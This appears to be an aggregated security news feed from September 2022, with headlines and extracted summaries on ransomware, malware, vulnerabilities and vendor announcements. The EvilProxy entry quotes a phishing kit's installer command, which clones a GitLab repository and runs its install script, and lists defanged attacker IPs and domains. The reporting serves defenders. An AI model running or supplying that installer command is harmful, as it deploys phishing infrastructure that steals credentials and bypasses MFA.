                With the rapid acceleration of cloud usage and digitized systems, a host of new security concerns are likely to emerge in the new year. Growing threats around network defense, data protection and multicloud strategies are dominating the security conversation, while cybercriminals have become faster, smarter and more discreet than ever before. It’s crucial that businesses, government agencies, schools and other organizations stay mindful of the latest predictions. 4 cybersecurity trends to watch in 2022 eBook … More

                The post eBook: 4 cybersecurity trends to watch in 2022 appeared first on Help Net Security.

                "

                Autosummary: "


                SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard

                industry
                2022-09-07 https://www.helpnetsecurity.com/2022/09/07/symphonyai-industrial-kpi-360/

                SymphonyAI Industrial has launched KPI 360, an AI-driven solution that uses real-time data monitoring and prediction to help manufacturing companies view different operational data sources through a single, intelligence dashboard that sets up in hours. Backed by SymphonyAI’s Eureka industrial AI platform, KPI 360 lets any type of user set up monitoring for strategic KPIs through a visual, no-code builder interface. Leveraging SymphonyAI Industrial’s proprietary domain knowledge engine, KPI 360 comes with pre-built KPIs for … More

                The post SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard appeared first on Help Net Security.

                "

                Autosummary: Flexibility and extensibility are built into KPI 360, so our customers can choose the visualization of their choice, link it to one or more KPIs, configure interactions with the visualizations, and change the visual appearance without writing a single line of code.”, Gallello continued. "


                Mirai Variant MooBot Botnet Exploiting D-Link Router Vulnerabilities

                exploits
                2022-09-07 https://thehackernews.com/2022/09/mirai-variant-moobot-botnet-exploiting.html
                A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits. "If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a "

                Autosummary: "If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a Tuesday report. "


                Critical RCE Vulnerability Affects Zyxel NAS Devices — Firmware Patch Released

                exploits
                2022-09-07 https://thehackernews.com/2022/09/critical-rce-vulnerability-affects.html
                Networking equipment maker Zyxel has released patches for a critical security flaw impacting its network-attached storage (NAS) devices. Tracked as CVE-2022-34747 (CVSS score: 9.8), the issue relates to a "format string vulnerability" affecting NAS326, NAS540, and NAS542 models. Zyxel credited researcher Shaposhnikov Ilya for reporting the flaw. "A format string vulnerability was found in a "

                Autosummary: "


                Google: Former Conti cybercrime gang members now targeting Ukraine

                ransomware
                2022-09-07 https://www.bleepingcomputer.com/news/security/google-former-conti-cybercrime-gang-members-now-targeting-ukraine/
                Google says some former Conti ransomware gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs). [...] "

                Autosummary: This group's attacks were observed between mid-April and mid-June, with frequent changes in its tactics, techniques, and procedures (TTPs), tooling, and lures, while targeting Ukrainian orgs (such as hotel chains) and impersonating the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink. "


                Most IT leaders think partners, customers make their business a ransomware target

                exploits ransomware
                2022-09-07 https://www.helpnetsecurity.com/2022/09/07/most-it-leaders-think-partners-customers-make-their-business-a-ransomware-target/

                Global organizations are increasingly at risk of ransomware compromise via their extensive supply chains. During May and June 2022 Sapio Research polled 2,958 IT decision-makers across 26 countries. The research revealed that 79% of global IT leaders believe their partners and customers are making their own organization a more attractive ransomware target. The challenge is particularly acute considering that potentially less well-secured SMBs make up a “significant” portion of the supply chain 52% of these … More

                The post Most IT leaders think partners, customers make their business a ransomware target appeared first on Help Net Security.

                "

                Autosummary: "


                Ransomware gang's Cobalt Strike servers DDoSed with anti-Russia messages

                exploits
                2022-09-07 https://www.bleepingcomputer.com/news/security/ransomware-gangs-cobalt-strike-servers-ddosed-with-anti-russia-messages/
                Someone is flooding Cobalt Strike servers operated by former members of the Conti ransomware gang with anti-Russian messages to disrupt their activity. [...] "

                Autosummary: When flooding the CS servers, these people are using the username “Stop Putin!” on multiple computers and changing their computer name to various messages, such as “Stop the war!,” “15000+ dead Russian soldiers!,” and “Be a Russian patriot!” "


                Albania blames Iran for July cyberattack, severs diplomatic ties

                ciber
                2022-09-07 https://www.bleepingcomputer.com/news/security/albania-blames-iran-for-july-cyberattack-severs-diplomatic-ties/
                Albanian Prime Minister Edi Rama announced on Wednesday that the entire staff of the Embassy of the Islamic Republic of Iran was asked to leave within 24 hours. [...] "

                Autosummary: "


                Massive hotel group IHG struck by cyberattack which disrupts booking systems

                ciber
                2022-09-07 https://www.bitdefender.com/blog/hotforsecurity/massive-hotels-group-ihg-struck-by-cyberattack-which-disrupts-booking-systems/
                InterContinental Hotels Group (IHG), which owns brands such as InterContinental, Crowne Plaza, Holiday Inn, and many others, has had its IT systems breached by malicious hackers. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                QNAP tells NAS users to “take immediate action” after new wave of DeadBolt ransomware attacks

                exploits ransomware
                2022-09-07 https://grahamcluley.com/qnap-tells-nas-users-to-take-immediate-action-after-new-wave-of-deadbolt-ransomware-attacks/
                Owners of QNAP NAS drives have been advised to "take immediate action" in the wake of a new wave of DeadBolt ransomware attacks. "

                Autosummary: "


                Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks

                financial ransomware
                2022-09-07 https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html
                Former members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022. The findings, which come from Google's Threat Analysis Group (TAG), build upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "UAC-0098 is a threat "

                Autosummary: The findings, which come from Google's Threat Analysis Group (TAG), build upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "


                New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices

                exploits industry
                2022-09-07 https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
                A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads. "An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist," AT&T Alien Labs said in a new report published Tuesday. The findings add to a "

                Autosummary: "


                North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns

                exploits
                2022-09-07 https://thehackernews.com/2022/09/north-korean-hackers-spotted-using-new.html
                The prolific North Korean nation-state actor known as the Lazarus Group has been linked to a new remote access trojan called MagicRAT. The previously unknown piece of malware is said to have been deployed in victim networks that had been initially breached via successful exploitation of internet-facing VMware Horizon servers, Cisco Talos said in a report shared with The Hacker News. "While being "

                Autosummary: "While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said. "


                HP fixes severe bug in pre-installed Support Assistant tool

                exploits
                2022-09-07 https://www.bleepingcomputer.com/news/security/hp-fixes-severe-bug-in-pre-installed-support-assistant-tool/
                HP issued a security advisory alerting users about a newly discovered vulnerability in HP Support Assistant, a software tool that comes pre-installed on all HP laptops and desktop computers, including the Omen sub-brand. [...] "

                Autosummary: The flaw, discovered by researchers at Secure D and reported to HP, is tracked as CVE-2022-38395 and has a "high" severity score of 8.2, as it enables attackers to elevate their privileges on vulnerable systems. "


                Cisco won’t fix authentication bypass zero-day in EoL routers

                exploits
                2022-09-07 https://www.bleepingcomputer.com/news/security/cisco-won-t-fix-authentication-bypass-zero-day-in-eol-routers/
                Cisco says that a new authentication bypass flaw affecting multiple small business VPN routers will not be patched because the devices have reached end-of-life (EoL). [...] "

                Autosummary: "


                Google says former Conti ransomware members now attack Ukraine

                exploits ransomware
                2022-09-07 https://www.bleepingcomputer.com/news/security/google-says-former-conti-ransomware-members-now-attack-ukraine/
                Google says some former Conti cybercrime gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs). [...] "

                Autosummary: This group's attacks were observed between mid-April and mid-June, with frequent changes in its tactics, techniques, and procedures (TTPs), tooling, and lures, while targeting Ukrainian orgs (such as hotel chains) and impersonating the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink. "


                Experts spotted a new stealthy Linux malware dubbed Shikitega

                exploits
                2022-09-07 https://securityaffairs.co/wordpress/135437/malware/shikitega-linux-malware.html

                A new Linux malware dubbed Shikitega leverages a multi-stage infection chain to target endpoints and IoT devices. Researchers from AT&T Alien Labs discovered a new piece of stealthy Linux malware, dubbed Shikitega, that targets endpoints and IoT devices. The malware stands out for its multistage infection chain, which threat actors use to gain full control of the system […]

                The post Experts spotted a new stealthy Linux malware dubbed Shikitega appeared first on Security Affairs.

                "

                Autosummary: "


                Warning issued about Vice Society ransomware targeting the education sector

                exploits ransomware
                2022-09-07 https://www.malwarebytes.com/blog/news/2022/09/authorities-issue-warning-about-vice-society-ransomware-targeting-the-education-sector

                Categories: News

                Categories: Ransomware

                Tags: FBI

                Tags: CISA

                Tags: StopRansomware

                Tags: Vice Society

                Tags: HelloKitty

                Tags: SonicWall

                Tags: PrintNightmare

                Tags: LAUSD

                The FBI, CISA, and the MS-ISAC have released a joint Cybersecurity Advisory after observing Vice Society threat actors disproportionately targeting the education sector with ransomware attacks.

                The post Warning issued about Vice Society ransomware targeting the education sector appeared first on Malwarebytes Labs.

                "

                Autosummary: Authentication
                Require all accounts with password logins to meet the required standards for developing and managing password policies:
                • Require multifactor authentication wherever you can—particularly for webmail, VPNs, and critical systems
                • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts
                • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege
                • Implement time-based access for accounts set at the admin level and higher
                • Use long passwords (CISA says 8 characters, we say you can do better than that) and password managers
                • Store passwords using industry best practice password hashing functions
                • Implement password rate limits and lockouts
                • Avoid frequent password resets (once a year is fine)
                • Avoid reusing passwords
                • Disable password “hints”
                • Require administrator credentials to install software
                Software
                Use anti-malware software, and keep all operating systems, software, and firmware up to date.
                Backups
                Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). "


                Sextortionists used mobile malware to steal nude videos, contact lists from victims

                exploits
                2022-09-07 https://www.malwarebytes.com/blog/news/2022/09/sextortionists-used-mobile-malware-to-steal-nude-videos-contact-lists-from-victims

                Categories: News

                Tags: interpol

                Tags: sextortion

                Tags: mobile malware

                Tags: extortion

                In an international police action supported by Interpol, law enforcement agencies have uncovered and dismantled an international sextortion ring.

                The post Sextortionists used mobile malware to steal nude videos, contact lists from victims appeared first on Malwarebytes Labs.

                "

                Autosummary: "


                Booz Allen Hamilton and CyberSaint provide clients with real-time insight into their cybersecurity posture

                ciber
                2022-09-07 https://www.helpnetsecurity.com/2022/09/08/booz-allen-hamilton-cybersaint/

                Booz Allen Hamilton and CyberSaint have formed a strategic partnership that aligns Booz Allen’s cybersecurity consulting services with CyberSaint’s cyber and IT risk management software, providing clients with an on-demand view of their cybersecurity posture against frameworks and standards like the NIST CSF paired with credible cyber risk quantification and analytics. Considering the fast-changing landscape of cybersecurity threats, organizations need a way to understand their cyber risks, whether that is ransomware from a criminal group … More

                The post Booz Allen Hamilton and CyberSaint provide clients with real-time insight into their cybersecurity posture appeared first on Help Net Security.

                "

                Autosummary: The Booz Allen Hamilton Cyber Risk Solution, powered by CyberSaint, is designed for strategic (BoD, ELT, ERM) and operational (CISO, Risk Director) stakeholders to measure, monitor, and manage their cybersecurity risks and control posture. "


                AkinovA’s clients can now benefit from CyberCube’s modeling and analytics

                industry
                2022-09-07 https://www.helpnetsecurity.com/2022/09/08/cybercube-akinova/

                CyberCube has partnered with AkinovA, to enable AkinovA’s clients to benefit from CyberCube’s modeling and analytics. The partnership will see CyberCube’s products made available to AkinovA’s platform. In doing so, the entire value chain of the risk transfer sector can gain access to CyberCube’s models. CyberCube’s models are based on cyber risk scenarios including ransomware attacks, cloud outages and major systemic risks to support the insurance, reinsurance and Insurance-Linked Securities (ILS) organisations to make better … More

                The post AkinovA’s clients can now benefit from CyberCube’s modeling and analytics appeared first on Help Net Security.

                "

                Autosummary: Henri Winand, AkinovA CEO, commented: “In 2020, AkinovA pioneered first-of-a-kind Cloud outage and cyber-induced electricity power generation downtime risk transfers together with AkinovA ecosystem partners, including a leading broker and underwriting capital. "


                Evasive Shikitega Linux malware drops Monero cryptominer

                exploits
                2022-09-07 https://www.malwarebytes.com/blog/news/2022/09/evasive-shikitega-linux-malware-drops-monero-cryptominer

                Categories: News

                Categories: Threats

                Researchers from AT&T Alien Labs Research have discovered a stealthy new Linux malware.

                The post Evasive Shikitega Linux malware drops Monero cryptominer appeared first on Malwarebytes Labs.

                "

                Autosummary: Protect your Linux system from Shikitega
                Linux users can protect their systems from Shikitega with standard Linux hardening precautions, prompt patching to close vulnerabilities like CVE-2021-4034 and CVE-2021-3493, and with effective anti-malware and EDR on servers and endpoints. "


                Government guide for supply chain security: The good, the bad and the ugly

                government
                2022-09-06 https://www.helpnetsecurity.com/2022/09/06/government-guide-supply-chain-security/

                Just as developers and security teams were getting ready to take a breather and fire up the BBQ for the holiday weekend, the U.S.’s most prestigious security agencies (NSA, CISA, and ODNI) dropped a 60+ page recommended practice guide, Securing the Software Supply Chain for Developers. My first reaction was that it’s great to see these agencies adding to the public discourse in these still heady days where we’re all sorting out software supply chain … More

                The post Government guide for supply chain security: The good, the bad and the ugly appeared first on Help Net Security.

                "

                Autosummary: The upshot of these frameworks is they give developers clear guidance on (1) how to develop secure code, from design issues to organizational structure issues for more secure software; (2) build system integrity (making sure malicious code isn’t being injected in our build systems); and (3) what happens after software is built and how to operate systems security (vulnerability remediation, monitoring, those types of aspects). "


                EvilProxy phishing-as-a-service with MFA bypass emerged on the dark web

                financial
                2022-09-06 https://www.helpnetsecurity.com/2022/09/06/evilproxy-phishing-as-a-service/

                Following the recent Twilio hack leading to the leakage of 2FA (OTP) codes, cybercriminals continue to upgrade their attack arsenal to orchestrate advanced phishing campaigns targeting users worldwide. Resecurity has recently identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. In some sources the alternative name is Moloch, which has some connection to a phishing kit developed by several notable underground actors who previously targeted financial institutions and the e-commerce sector. While the … More

                The post EvilProxy phishing-as-a-service with MFA bypass emerged on the dark web appeared first on Help Net Security.

                "

                Autosummary: zM2MDMtZWNhZC00ZWFmLWE5YjMtYzgzZTFjM2E1ZDdl&ui_locales=en-US&mkt=en-US&state=jHi-CP0Nu4oFHIxklcT1adstnCWbwJwuXQWTxNSSsw-23qiXK-6EzyYoAyNZ6rHuHwsIYSkRp99F-bqPqhN4JVCnT4-3MQIDvdTKapKarcqaMFi6_xv2__3D0KfqBQ070ykGBGlwxFQ6Mzt9CwUsz2zdgcB4jFux2BhZQwcj-WumSBz0VQs5VePV-wz00E8rDxEXfQdlv-AT29EwdG77AmGWinyf3yQXSZTHJyo8s-IWSHoly3Kbturwnc87sDC3uwEn6VDIjKbbaJ-c-WOzrg&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.16.0.0
                Post-authorization URL https://473126b6-bf9a-4a96-8111-fb04f6631ad8-571c4b21.
                The automated installer has a reference to a user “Olf Dobs” (ksh8h297aydO) on Gitlab:
                apt update -qqy && apt dist-upgrade --no-install-recommends --no-install-suggests -o Dpkg::options::="--force-confdef" -y \
                && apt install --no-install-recommends --no-install-suggests -y git \
                && rm -rf /srv/control-agent && git clone --recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \
                && cd /srv/control-agent && chmod +x ./install.sh \
                && /srv/control-agent/install.sh "[license_key]"
                After a successful deployment, the scripts will forward the traffic from the victims via 2 gateways defined as “upstream”. Based on further analysis, we identified some of the domain names used for phishing campaigns:
                147[.]78[.]47[.]250
                185[.]158[.]251[.]169
                194[.]76[.]226[.]166
                msdnmail[.]net
                evilproxy[.]pro
                top-cyber[.]club
                rproxy[.]io
                login-live.rproxy[.]io
                gw1.usd0182738s80[.]click:9000
                gw2.usd0182738s80[.]click:9000
                cpanel.evilproxy[.]pro
                cpanel.pua75npooc4ekrkkppdglaleftn5mi2hxsunz5uuup6uxqmen4deepyd[.]onion "


                Ant Group supports industrial collaborations in the digital economy with more accessible AI

                industry
                2022-09-06 https://www.helpnetsecurity.com/2022/09/06/ant-group-three-initiatives/

                Ant Group has unveiled three initiatives to make trusted AI more accessible. This includes making its graph processing database TuGraph open source; launching an AI security testing platform; and a privacy-preserving computation open platform. Announced at the World Artificial Intelligence Conference (“WAIC”) in Shanghai, these actions aim to make trusted AI solutions more accessible to enable industrial multi-party collaborations in the digital economy. A growing number of industries have been adopting AI technology at a … More

                The post Ant Group supports industrial collaborations in the digital economy with more accessible AI appeared first on Help Net Security.

                "

                Autosummary: “We believe that Privacy-Preserving Computation, Blockchain, Graph-Processing Technology, Distributed Database and Green Computing are the fundamental technologies for a large-scale industrial application of AI in the digital economy. "


                Second largest U.S. school district LAUSD hit by ransomware

                exploits ransomware
                2022-09-06 https://www.bleepingcomputer.com/news/security/second-largest-us-school-district-lausd-hit-by-ransomware/
                Los Angeles Unified (LAUSD), the second largest school district in the U.S., disclosed that a ransomware attack hit its Information Technology (IT) systems over the weekend. [...] "

                Autosummary: "After the District contacted officials over the holiday weekend, the White House brought together the Department of Education, the Federal Bureau of Investigation (FBI) and the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) to provide rapid, incident response support to Los Angeles Unified, building on the immediate support by local law enforcement agencies," the district said. "


                DeadBolt is hitting QNAP NAS devices via zero-day bug, what to do?

                exploits
                2022-09-06 https://www.helpnetsecurity.com/2022/09/06/deadbolt-hitting-qnap-nas/

                A few days ago – and smack in the middle of the weekend preceding Labor Day (as celebrated in the U.S.) – Taiwan-based QNAP Systems has warned about the latest round of DeadBolt ransomware attacks targeting users of its QNAP network-attached storage (NAS) devices. “QNAP detected a new DeadBolt ransomware campaign on the morning of September 3rd, 2022 (GMT+8). The campaign appears to target QNAP NAS devices running Photo Station with internet exposure,” the company … More

                The post DeadBolt is hitting QNAP NAS devices via zero-day bug, what to do? appeared first on Help Net Security.

                "

                Autosummary: “QNAP Product Security Incident Response Team (QNAP PSIRT) had made the assessment and released the patched Photo Station app for the current version within 12 hours,” the company said, and urged users to:
                • Update Photo Station to the latest available version or switch to using QuMagie, a similar app for managing photo storage
                • Remove their QNAP NAS from the internet
                “We recommend users to make use of the myQNAPcloud Link feature provided by QNAP, or enable the VPN service. "


                New EvilProxy Phishing Service Allowing Cybercriminals to Bypass 2-Factor Security

                financial ciber
                2022-09-06 https://thehackernews.com/2022/09/new-evilproxy-phishing-service-allowing.html
                A new phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy is being advertised on the criminal underground as a means for threat actors to bypass two-factor authentication (2FA) protections employed against online services. "EvilProxy actors are using reverse proxy and cookie injection methods to bypass 2FA authentication – proxifying victim's session," Resecurity researchers said in a Monday "

                Autosummary: "


                QNAP Warns of New DeadBolt Ransomware Attacks Exploiting Photo Station Flaw

                exploits ransomware
                2022-09-06 https://thehackernews.com/2022/09/qnap-warns-of-new-deadbolt-ransomware.html
                QNAP has issued a new advisory urging users of its network-attached storage (NAS) devices to upgrade to the latest version of Photo Station following yet another wave of DeadBolt ransomware attacks in the wild by exploiting a zero-day flaw in the software. The Taiwanese company said it detected the attacks on September 3 and that "the campaign appears to target QNAP NAS devices running Photo "

                Autosummary: "


                China accuses the US of cyberattacks

                ciber
                2022-09-06 https://securityaffairs.co/wordpress/135369/cyber-warfare-2/china-accuses-us-cyberattacks.html

                China accuses the United States of conducting tens of thousands of cyberattacks on its country, including cyberespionage campaigns. The Government of Beijing accused the United States of launching tens of thousands of cyberattacks on China. The attacks aimed at stealing sensitive data from government entities and universities. In the past, the US Government has accused […]

                The post China accuses the US of cyberattacks appeared first on Security Affairs.

                "

                Autosummary: "


                New Linux malware evades detection using multi-stage deployment

                exploits
                2022-09-06 https://www.bleepingcomputer.com/news/security/new-linux-malware-evades-detection-using-multi-stage-deployment/
                A new stealthy Linux malware known as Shikitega has been discovered infecting computers and IoT devices with additional payloads. [...] "

                Autosummary: Downloaded shellcode fetching Mettle (AT&T)
                Mettle then fetches an even smaller ELF file, which exploits CVE-2021-4034 (aka PwnKit) and CVE-2021-3493 to elevate privileges and download the final-stage payload, a cryptocurrency miner, as root. "


                New Worok cyber-espionage group targets governments, high-profile firms

                government
                2022-09-06 https://www.bleepingcomputer.com/news/security/new-worok-cyber-espionage-group-targets-governments-high-profile-firms/
                A newly discovered cyber-espionage group has been hacking governments and high-profile companies in Asia since at least 2020 using a combination of custom and existing malicious tools. [...] "

                Autosummary: "


                Go-Ahead cyberattack might derail UK public transport services

                ciber
                2022-09-06 https://www.helpnetsecurity.com/2022/09/06/go-ahead-cyberattack/

                One of the UK’s largest public transport operators, Go-Ahead Group, has fallen victim to a cyberattack. The Go-Ahead Group, which connects people across its bus and rail networks, reported it was “managing a cyber security incident” after “unauthorized activity” was detected on its network. This type of cyber strike on the UK’s transport system isn’t uncommon. Hackers have regularly been targeting the airline industry for some time. By design, the cyberattacks intend to cause interruptions … More

                The post Go-Ahead cyberattack might derail UK public transport services appeared first on Help Net Security.

                "

                Autosummary: Stretched beyond capacity
                Nearly seven in ten (69%) mid-sized organizations have three people or fewer in their team looking after cyber security, according to Censornet’s ‘UK Mid-Market on Code Red Report’. "


                Minecraft is hackers’ favorite game title for hiding malware

                exploits
                2022-09-06 https://www.bleepingcomputer.com/news/security/minecraft-is-hackers-favorite-game-title-for-hiding-malware/
                Security researchers have discovered that Minecraft is the most heavily abused game title by cybercriminals, who use it to lure unsuspecting players into installing malware. [...] "

                Autosummary: Yet, Minecraft dominates this category, too, with a 40% share, followed by GTA (15%), PUBG (10%), Roblox (10%), and FIFA (5%). "


                FBI warns of Vice Society ransomware attacks on school districts

                exploits ransomware
                2022-09-06 https://www.bleepingcomputer.com/news/security/fbi-warns-of-vice-society-ransomware-attacks-on-school-districts/
                FBI, CISA, and MS-ISAC warned today of U.S. school districts being increasingly targeted by the Vice Society ransomware group, with more attacks expected after the start of the new school year. [...] "

                Autosummary: "The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file," the federal law enforcement agency said. "


                Zyxel releases new NAS firmware to fix critical RCE vulnerability

                exploits
                2022-09-06 https://www.bleepingcomputer.com/news/security/zyxel-releases-new-nas-firmware-to-fix-critical-rce-vulnerability/
                Zyxel Corporation, the Taiwanese networking and data storage device maker, has issued a security advisory to warn clients of a critical remote code execution (RCE) vulnerability impacting three models of its NAS products. [...] "

                Autosummary: Impacted models table (Zyxel)
                Alternatively, you can visit Zyxel’s official download portal, enter your device model, and download the latest firmware update listed in the results. "


                InterContinental Hotels Group cyberattack disrupts booking systems

                ciber
                2022-09-06 https://www.bleepingcomputer.com/news/security/intercontinental-hotels-group-cyberattack-disrupts-booking-systems/
                Leading hospitality company InterContinental Hotels Group PLC (also known as IHG Hotels & Resorts) says its information technology (IT) systems have been disrupted since yesterday after its network was breached. [...] "

                Autosummary: Its brands include luxury, premium, and essential hotel chains such as InterContinental, Regent, Six Senses, Crowne Plaza, Holiday Inn, and many others. "


                AA22-249A: #StopRansomware: Vice Society

                exploits
                2022-09-06 https://us-cert.cisa.gov/ncas/alerts/aa22-249a
                Original release date: September 6, 2022

                Summary

                Actions to take today to mitigate cyber threats from ransomware:

                • Prioritize and remediate known exploited vulnerabilities.
                • Train users to recognize and report phishing attempts.
                • Enable and enforce multifactor authentication.

                Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.

                Over the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, has been a frequent target of ransomware attacks. "

                Autosummary: Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
                Identity and Access Management: Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.
                REPORTING: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
                Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
                To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [T1053], creating undocumented autostart Registry keys [T1547.001], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [T1574.002].
                The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022.
                The FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Vice Society actors:
                Preparing for Cyber Incidents: Maintain offline backups of data, and regularly maintain backup and restoration.
                Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [TA0010] for double extortion--a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. "


                The Los Angeles Unified School District hit by a ransomware attack

                exploits ransomware
                2022-09-06 https://securityaffairs.co/wordpress/135411/cyber-crime/los-angeles-unified-school-district-ransomware.html

                One of the largest school districts in the US, the Los Angeles Unified School District, suffered a ransomware attack during the weekend. The Los Angeles Unified School District, one of the largest school districts in the US, was hit by a ransomware attack during the Labor Day weekend. The security breach took place a few […]

                The post The Los Angeles Unified School District hit by a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                A new Android malware used to spy on the Uyghur Community

                exploits
                2022-09-06 https://securityaffairs.co/wordpress/135403/malware/android-malware-spy-uyghur.html

                Experts spotted new Android spyware that was used by China-linked threat actors to spy on the Uyghur community in China. Researchers from Cyble Research & Intelligence Labs (CRIL) started their investigation after MalwareHunterTeam experts shared information about a new Android malware used to spy on the Uyghur community. The malware disguised as a book titled “The China […]

                The post A new Android malware used to spy on the Uyghur Community appeared first on Security Affairs.

                "

                Autosummary: “Upon performing behavioral analysis, we observed that this malware has an icon similar to the cover page of the book known as The China Freedom Trap written by Dolkun Isa, and on opening the app, the user is shown a few pages of the book including the cover page, an introduction to the book and its author, along with a condolence letter at the end.” "


                Update now! QNAP warns users DeadBolt is exploiting Photo Station vulnerability

                exploits
                2022-09-06 https://www.malwarebytes.com/blog/news/2022/09/update-now-qnap-warns-users-about-deadbolt-leveraging-exploitation-of-photo-station-vulnerability

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: QNAP

                Tags: Photo Station

                Tags: Deadbolt

                Tags: ransomware

                Tags: VPN

                QNAP says it's detected that DeadBolt is exploiting a Photo Station vulnerability to encrypt QNAP NAS systems directly connected to the internet.

                The post Update now! QNAP warns users DeadBolt is exploiting Photo Station vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: Photo Station 5.7.18 and later
                QTS 4.3.3: Photo Station 5.4.15 and later
                QTS 4.2.6: Photo Station 5.2.14 and later
                How to fix the QNAP Photo Station vulnerability
                Update Photo Station to the latest available version or switch to QuMagie. "


                Worok Hackers Target High-Profile Asian Companies and Governments

                government
                2022-09-06 https://thehackernews.com/2022/09/worok-hackers-target-high-profile-asian.html
                High-profile companies and local governments located primarily in Asia are the subjects of targeted attacks by a previously undocumented espionage group dubbed Worok that has been active since late 2020. "Worok's toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files," ESET "

                Autosummary: "


                Your vendors are likely your biggest cybersecurity risk

                ciber
                2022-09-05 https://www.helpnetsecurity.com/2022/09/05/vendors-cybersecurity-risk/

                As the speed of business increases, more and more organizations are looking to either buy companies or outsource more services to gain market advantage. With organizations expanding their vendor base, there is a critical need for holistic third-party risk management (TPRM) and comprehensive cybersecurity measures to assess how much risk vendors pose. While organizations assess and manage risk on a multitude of layers, none present bigger threats to business resiliency than third-party risk and a lack … More

                The post Your vendors are likely your biggest cybersecurity risk appeared first on Help Net Security.

                "

                Autosummary: Addressing cybersecurity with your third parties
                A cross-functional approach to TPRM and cybersecurity reduces duplicative work and lends deeper insight into enterprise risk for your organization, your vendors, and your partners. Organizations that understand and implement integrated cybersecurity and TPRM systems gain a complete view of their vendor’s risk profile, comprehensively prepare for possible threats and compliance violations, and improve business results with trustworthy secure vendors. "


                Ransomware attacks on Linux to surge

                exploits
                2022-09-05 https://www.helpnetsecurity.com/2022/09/05/ransomware-groups-target-linux/

                Trend Micro predicted that ransomware groups will increasingly target Linux servers and embedded systems over the coming years. It recorded a double-digit year-on-year (YoY) increase in attacks on these systems in 1H 2022. Jon Clay, VP of threat intelligence for Trend Micro, said: “New and emerging threat groups continue to evolve their business model, focusing their attacks with even greater precision. That’s why it’s essential that organizations get better at mapping, understanding, and protecting their … More

